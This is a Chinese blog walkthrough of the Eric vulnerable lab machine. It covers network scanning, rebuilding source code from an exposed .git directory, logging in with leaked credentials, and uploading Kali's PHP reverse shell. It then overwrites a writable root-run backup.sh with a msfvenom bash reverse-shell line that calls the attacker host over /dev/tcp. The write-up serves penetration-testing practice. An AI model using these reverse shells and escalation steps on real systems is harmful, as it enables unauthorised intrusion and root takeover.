Eric靶机渗透测试通关全教程

最新推荐文章于 2024-04-25 15:54:14 发布
最新推荐文章于 2024-04-25 15:54:14 发布
阅读量2.5k 收藏
点赞数 1
分类专栏: 渗透 文章标签: php 测试工具 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WuYan_Emperor/article/details/126063613
版权

环境准备

联不联网无所谓,主要是要在同一网段下

  • 靶机:Eric

  • 攻击机:Kali (192.168.56.102)

渗透目标

  • 拿到普通用户下的flag

  • 拿到root用户下的flag

渗透测试实战

已知靶机和我们的Kali虚拟机同同一网段,现在先用nmap扫描一下此网段,得到EricIP地址
nmap -sF 192.168.56.0/24

nmap_ip
这里可以看到到Eric靶机的IP192.168.56.101

而且发现它的80端口是开着的,(22端口是ssh不用管),直接浏览器中访问一下

blog
很明显,Blog还没有开发完成

这个时候需要得到网站的目录,枚举一下dirb http://192.168.56.101

dirb
可以发现如上三个敏感目录是我们感兴趣的

访问admin.php会有登陆界面,但是并没有爆破出来。。。。。

访问upload无权限

这时候需要注意的是有.git敏感目录,这里以这个作为突破点,用如下大佬们的工具,通过泄露的.git文件夹下的文件,重建还原工程源代码

GitToolshttps://github.com/internetwache/GitTools

GitHackhttps://github.com/lijiejie/GitHack

在这里使用的是GitHack

git clone https://github.com/lijiejie/GitHack.git
cd GitHack

运行py文件重建还原网址代码即可

python GitHack.py http://192.168.56.101/.git/

gitclone
直接看一下这些php文件中内容是什么

然后在其中可以发现admin.php中有账号和密码

cat-1

试试直接用这里的账号和密码直接登录http:192.168.56.101/admin.php

可以发现是成功登录了
login

可以发现它登录后是一个上传文件的网站,这样的很明显可以来上传shell

可以自己构造一个shell,也可以用kali自带的

这里使用kali自带的

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/test.php

需要修改一下ip/port(为kali本机地址)

vim test.php
vim_1

保存后,kali再起一个监听,这里的1234为上面test.php设置的port

nc -nlvp 1234

nc

然后直接把修改后的shell在登录后的界面上传上去test.php
upload

Browse...选择shellUpload点击上传

上传的文件路径为会在当前靶机网址的/upload/目录下

在浏览器中直接访问该shell即可,

http://192.168.56.101/upload/test.php

这样就可以发现反弹shell成功了

shell_nc

接下来在nc窗口用命令直接去/home/eric/目录下,用ls -la看一下文件和文件权限

可以发现其中有flag.txt,这就是我们的目标

同时发现backup.sh配置权限有问题,很明显它可以写入脚本用来提权,待会提权root就用它了

这里先拿到普通用户下的flag就行

cd /home/eric
ls -la
cat flag.txt

ls_cat

这里就拿到了普通用户权限下的flag了,还差root用户下的

先看一下backup.sh文件是什么内容

backup
可以发现它就是压缩打包网站的目录,这种的直接修改sh文件就行

kali中用msf工具打印一个shell脚本来用用(lhostkaliIPlport随便即可)

msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=1235 A

msf

把这一段脚本echobackup.sh

echo "bash -c '0<&78-;exec 78<>/dev/tcp/192.168.56.102/1235;sh <&78 >&78 2>&78'">backup.sh

echo
然后kali本机起一个监听nc -nlvp 1235(1235为上面msf设置的lport)

然后直接运行sh文件./backup.sh,这样就提权成功了

直接cat flag.txt看一下root下的flag就行

tiquan_cat

这里就拿到了ROOT用户权限下的flag

完结,撒花❀❀❀

BIG_权
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC1-9靶机搭建
EricXT的博客
05-28 781
一、DC实验环境搭建 1.虚拟机环境:选择安装版本VMware Workstation 15.5 DC1-9靶机文件为ova格式,需要新版本VMware的支持导入。 网络连接选择:NAT模式,“”高级”中生成MAC地址。 2.渗透测试系统环境: 选择安装最新版本Kali 2020-2,可在此下载系统安装包。 (1)为Kali安装VMware Tools 开始安装,一路Enter即可,出现以下提醒,表示安装成功。 (2)更新Kali的镜像源: Step1:vim /etc/apt/sources.lis
【Linux-Ubuntu系列】Ubuntu18.04安装Docker搭建靶机
CrisimpleHome
12-31 1479
Ubuntu18.04安装Docker搭建靶机 一.配置Docker基础运行环境 1.安装python3版本及对应的pip3 # 一般Ubuntu发行版本都会默认自带python的两个版本python2和python3 sudo apt-get install python3 # 查询当前python的版本 python3 -V # 安装python3对应的pip3安装工具 sudo apt in...
靶机渗透】eric靶机通关练习
serendipity1130的博客
08-30 434
1.扫描存活主机ip: sudo arp-scan -l netdiscover -r 192.168.225.133 -i eth0 2.探测开放端口: nmap 192.168.225.138 -sV -sC -Pn -n -v -T5 -p- 看到开放了80和22端口,同时扫描到他的git源码泄露 首先,先访问一下80端口,发现没有什么信息量 3.扫目录,扫出admin.php(访问发现是个登录界面),upload(说明可以上传),robots.txt(应该有信息) 3.
vulnhub渗透日记18:SpyderSec Challenge
ericalezl的博客
07-30 79
⏰时间:2023.7.30🗺️靶机地址: https://download.vulnhub.com/spydersec/SpyderSecChallenge.ova⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2636
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
01-07 2万+
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
完整的渗透测试靶场通关
NZXHJ的博客
07-15 1910
记录一次比较系统的内网渗透靶场通关的文章
SP eric靶机通关攻略
systemino的博客
04-30 805
大家好,今天给大家带来的靶机是SP eric,这个靶机有两个flag,我们的目标就是把它们都找出来,flag的位置已经提供,如下: ·/root/flag.txt ·/root/eric/flag.txt 靶机下载地址:https://www.vulnhub.com/entry/sp-eric,274/ 渗透方法 ·网络扫描 ·访问HTTP服务端口 ·使用dirb遍历目录 ...
Eric靶机渗透测试
weixin_52971422的博客
04-12 3242
Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 细致的扫描靶机,发现80端口的网站有.git敏感目录,但是不急。 nmap -sV -A -p- 192.168.0.4 -T4 对网站细致的目录枚举 dirb http://192.168.0.4/ 发现有三个敏感目录 一个个好好康康嘿嘿 先admin.ph.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Eric6与pyqt5学习笔记 7【教程资料分享】-附件资源
03-05
Eric6与pyqt5学习笔记 7【教程资料分享】-附件资源
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 487
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 847
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Android配置环境
u012627628的博客
04-24 312
执行命令:sudo mv /home/用户名/Downloads/android-sdk-linux /usr/java。sudo mv /home/用户名/Downloads/jdk1.8.0_271 /usr/java。执行命令:/usr/java/android-sdk-linux/tools/android。执行命令:tar -zxvf android-sdk-linux.tgz。执行 source /etc/profile。验证是否安装成功(我验证是成功的)执行:java -version。
PHP】sign加签方法示例
最新发布
q8688的博客
04-25 337
【代码】【PHP】sign加签方法示例。
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BIG_权

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值